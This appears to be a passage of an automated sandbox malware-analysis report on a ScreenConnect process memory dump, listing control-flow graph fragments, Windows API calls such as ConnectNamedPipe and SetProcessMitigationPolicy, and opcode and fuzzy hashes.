                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1466433594.00007FFE7CC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CC90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ffe7cc90000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: MitigationPolicyProcess
                                                                      • String ID:
                                                                      • API String ID: 1088084561-0
                                                                      • Opcode ID: bd4ef92f8069d8ad14eb4cb5a38292f77db828e772ee9c68eab838bdc2ab9998
                                                                      • Instruction ID: 2e56c2b6ca6fd44bb108141a98475d1abe28431f9dce7563160fb72b14487b56
                                                                      • Opcode Fuzzy Hash: bd4ef92f8069d8ad14eb4cb5a38292f77db828e772ee9c68eab838bdc2ab9998
                                                                      • Instruction Fuzzy Hash: 0D41083191CB588FD714AFAC984A5F97BE4EF55311F04417FE089C3562DB28A446C791

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 230 7ffe7cc93662-7ffe7ccb6690 ConnectNamedPipe 234 7ffe7ccb6698-7ffe7ccb66e0 call 7ffe7ccb66e1 230->234 235 7ffe7ccb6692 230->235 235->234
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1466433594.00007FFE7CC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CC90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ffe7cc90000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: ConnectNamedPipe
                                                                      • String ID:
                                                                      • API String ID: 2191148154-0
                                                                      • Opcode ID: aaeb220a662fbbd5d7dd08843d58061b921b8be170d290218b4d8ead77140f4b
                                                                      • Instruction ID: dc82a6454fb8492c6f510069e90fe7e48e5e47b1138cb98cd6d0b3a7e2b77aef
                                                                      • Opcode Fuzzy Hash: aaeb220a662fbbd5d7dd08843d58061b921b8be170d290218b4d8ead77140f4b
                                                                      • Instruction Fuzzy Hash: 77317C31908A1C8FDB58EF98C849BEDB7F1FB58311F00826AD00DD7256DB70A855CB81

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 239 7ffe7cc93aa2-7ffe7cc980ef 241 7ffe7cc980f6-7ffe7cc98150 SetProcessMitigationPolicy 239->241 242 7ffe7cc98158-7ffe7cc98187 241->242 243 7ffe7cc98152 241->243 243->242
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.1466433594.00007FFE7CC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CC90000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ffe7cc90000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: MitigationPolicyProcess
                                                                      • String ID:
                                                                      • API String ID: 1088084561-0
                                                                      • Opcode ID: b3c476df1fa754b8d1a181aeb2137b41de6efde2a4951640e4802ef1c2408ab1
                                                                      • Instruction ID: 4bb96d92ed901d23aaadff9866d72af78809ccd321f525602f2cc9ecbdf1d475
                                                                      • Opcode Fuzzy Hash: b3c476df1fa754b8d1a181aeb2137b41de6efde2a4951640e4802ef1c2408ab1
                                                                      • Instruction Fuzzy Hash: 3721E53191CB188FDB18AF9C984A6F9B7E4EB59711F00412FE049D3251DB74B8468B92